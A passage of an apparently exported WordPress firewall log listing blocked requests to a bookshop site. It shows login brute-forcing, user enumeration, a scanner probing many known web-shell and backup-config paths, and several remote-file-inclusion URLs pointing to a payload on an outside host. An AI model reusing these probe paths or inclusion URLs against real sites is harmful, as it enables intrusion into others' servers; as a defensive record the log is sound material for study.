Firefox\\/68.0\"}','USG36PwWeVtFnbNy7j5Tdh4C',0,1637140019.9421,503,'','POST',403,0,700,0,1,'',0),('192.187.118.206',3233511118,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux i686) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','cTBzprnoqV9gXHh7OCyWixGS',0,1637144160.9583,176,'','POST',403,0,600,0,1,'',0),('204.12.198.244',3423389428,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8xu9PW0kneJQ5OfbRF7UqgIp',0,1637144601.8267,168,'','POST',403,0,600,0,1,'',0),('178.128.218.225',2994789089,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','x92aSZzyDjXlrH4oTmEBwFVY',0,1637146979.0276,1163,'','GET',403,0,520,0,1,'',0),('178.128.218.225',2994789089,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','4CuOWRmJyF9B8nfPh0cX3IEH',0,1637147432.4803,455,'','GET',403,0,520,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-includes/Requests/Exception/HTTPS.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','P4vrnAFDsJXlidIhuocR8L20',0,1637148789.3598,675,'','POST',403,0,700,0,1,'',0),('143.244.45.131',2415144323,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','QYjKlgCvI574JLdANeSnmZVH',0,1637149377.1530,361,'','GET',403,0,520,0,1,'',0),('192.187.127.22',3233513238,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','yQ4EAqosFJCvPVStmghwpY2I',0,1637151962.1565,441,'','POST',403,0,600,0,1,'',0),('194.163.133.151',3265496471,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','50jpRce31OobFuWSvN9t7IKA',0,1637152237.2052,469,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YPEQNZsHoGFO3cWCR2Ivrmld',0,1637152809.6761,414,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zhIVbZtTQq3vkBmO0UWNwf92',0,1637152812.6437,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wrBRqYjFVX9acpv6ZQGNxePJ',0,1637152815.9957,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wairGvMjb1AFc3Zx0RypsWoL',0,1637152818.3964,401,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','74B3tibfrnMceVp8qXsyQNGD',0,1637152823.9753,392,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wWH4psVtcMxOfkzuXbrUYiP0',0,1637152827.2224,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','iTmntNp7AU5jLfd4XSHaKkzW',0,1637152829.3924,380,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BCSi7XhHqPReac4nv6mQLWrN',0,1637152831.2905,420,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3ekQWYP4KnUMCRJm8zAbOS7o',0,1637152849.6421,521,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ptScheDKMkrbgEZ70Q3qXiA8',0,1637152863.9496,985,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nWKqTCbvSyAdQj2sXkfHg79m',0,1637152866.3571,509,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gldnDyIf4wxUJMzoL8ZQG9ia',0,1637152868.9085,532,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Y3c4zNonlTG08ihJvMebQrHj',0,1637152870.6680,1045,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZKxjk1Y5RpXzutU0FHhI2omd',0,1637152873.4614,536,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8mdH1vXS5bZltrxMKuhA4Niy',0,1637152875.7190,578,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yiM2LtDBQWKAahCX0cPYE8bw',0,1637152878.0452,517,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','eAkIfb41GTHitsmuF76S09qy',0,1637152880.4522,1984,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AyMtoF20KmN9BfSn1ECTDeXO',0,1637152884.3370,1001,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pd3gsPnrHaF4q2DU0YSXj5iZ',0,1637152887.1077,504,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','L4VgkQsGNaHKYbmUtoAneROW',0,1637152890.0944,980,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xEv2MrN3DXK68jIQ90nacitC',0,1637152893.0965,962,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Jwa6ZuthAW0ID254VrpSO9kP',0,1637152895.8334,1740,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3UBF7jR9uzfq5YMbWphdaL1G',0,1637152899.6155,4723,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','duHbLt4lEgNS8ohCT5Z0BiVv',0,1637152905.9302,814,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Ap2DLoVa8nFutlMjxS53ZPsH',0,1637152908.3004,795,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ruZe5vsqOmlNDyKWEkUbIx7c',0,1637152914.8222,4815,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SaRW9gNuJdnqULlPcQmz7hoA',0,1637152920.8585,784,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2gZQ0v5lmi1Lok6FwtIWXha3',0,1637152923.7204,768,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VKPGMnDoixWyAtEZ47O5vTgS',0,1637152926.3266,727,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','De7ftC3RizlIoTKjw0p6Fc4X',0,1637152928.9924,622,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DLBrTfMdVI9gbm0XaZAqQ7WR',0,1637152931.3116,388,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','T5C20UWsROAJfMoVwjE7ePdl',0,1637152933.3621,667,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','muSGtspWhH6XUNKRzoIQjqe9',0,1637152935.6837,667,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PCRg1VHrzQq3J0UBEN4cnuo9',0,1637152938.4661,758,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Q1pfKOUeIg546CAyoGRZdYsl',0,1637152940.8338,805,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','k2Z7TlI8do91HOKL0XV6iUcr',0,1637152943.4609,376,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','D6VWZTiPeUk7x95L8KNlXSws',0,1637152945.5065,342,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pfeWqT4tPO5VZ2ohx1kvGAXj',0,1637152947.3741,1637,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LVb8NXWapuOGHcPAeQolm9sC',0,1637152951.0293,382,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Ypxym90t81NsOGLaQZC5vfAJ',0,1637152953.2958,360,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','iZU9XF5cOK0Mq4a1nx2yfGJD',0,1637152958.8602,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AUmKWdCzTIfg9i6pE40MwoG2',0,1637152961.0479,326,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hPcoijLA6fZ5nMu1qt7amxKN',0,1637152963.4177,1427,'','GET',403,0,700,0,1,'',0),('69.30.225.182',1159651766,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','vC6biekqNVItOpD4d8yn9Xxh',0,1637153424.6970,178,'','POST',403,0,600,0,1,'',0),('104.248.1.96',1761083744,'','https://ashbooks.co.uk/wp-content/plugins/wp-sph/sh/config.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"ashbooks.co.uk\"}','N40WpzIJaqD2179RY8OQkPws',0,1637153535.2489,462,'','GET',403,0,700,0,1,'',0),('104.154.85.100',1754944868,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','2iFlEMUoywpe7BjQxf6NSPtn',0,1637153587.9074,478,'','POST',403,0,600,0,1,'',0),('96.125.171.153',1618848665,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','E14p6Cwh0IHUZbMYxkBreAgN',0,1637155003.5726,528,'','POST',403,0,600,0,1,'',0),('139.59.85.224',2335921632,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','A3qMQSZgfUJoVLY7Erb0Xs6n',0,1637156553.9042,631,'','POST',403,0,600,0,1,'',0),('18.191.58.123',314522235,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\\/20100101 Firefox\\/94.0\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','fvQqtSlLmR5kTobVD7zE0wC6',0,1637156806.7174,147,'','GET',403,0,520,0,1,'',0),('81.88.52.168',1364735144,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','Bw8ZpsSQHyugMxTimW0EhRqC',0,1637158237.6821,497,'','POST',403,0,600,0,1,'',0),('103.28.49.63',1729900863,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','WGjENCFTo0iA42XH9PLnxMrB',0,1637159811.8991,612,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','CPgUoat35OvIy8np4LzGc1xq',0,1637160605.5082,175,'','POST',403,0,600,0,1,'',0),('187.51.127.28',3140714268,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','9MWBHLEaKCfJOgh3QlF0ZXtc',0,1637161317.5537,630,'','POST',403,0,600,0,1,'',0),('192.187.127.22',3233513238,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','wKofRM0LtXzkSlYmC82s39y6',0,1637161976.5800,174,'','POST',403,0,600,0,1,'',0),('149.202.23.213',2513049557,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','fUwoZXE6Qrh25NuvCFyqeLSd',0,1637164479.1635,525,'','POST',403,0,600,0,1,'',0),('54.38.181.202',908506570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','7u0KNCMgXoItv5Rf3H8mplQc',0,1637166170.1487,891,'','POST',403,0,600,0,1,'',0),('111.231.4.211',1877411027,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','XmOUzEcWnYKhqudRJQGCS37H',0,1637167698.0877,591,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','fRsONAojVed7ZPH0tgvmyWxD',0,1637167977.8544,162,'','POST',403,0,600,0,1,'',0),('5.188.62.214',96222934,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','DYrsOKLlVfEFzxiZ3MBh6v8y',0,1637168369.7178,484,'','POST',403,0,600,0,1,'',0),('69.30.240.28',1159655452,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','uGzvYEkd5pRD09q1fatxQLXT',0,1637170478.1317,420,'','POST',403,0,600,0,1,'',0),('5.188.62.214',96222934,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','Rp0qgloLDjMefwaZB9duAHXE',0,1637170536.8554,484,'','POST',403,0,600,0,1,'',0),('5.189.133.114',96306546,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','L5OJZ60AxUTj9WMp3SulBIw8',0,1637172506.5551,496,'','POST',403,0,600,0,1,'',0),('47.242.19.52',804393780,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','5zJmQasi08GkjYrqeKfBOTd1',0,1637174077.0482,457,'','POST',403,0,600,0,1,'',0),('103.149.154.8',1737857544,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','LuMiV19tYqAygmCowe0USsPI',0,1637175588.5498,550,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QhB5sPNS98nqZUJ7C1RrdDMj',0,1637175957.5010,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0LQEpRJ91SV7aIwrNudlcs4U',0,1637175959.5338,389,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 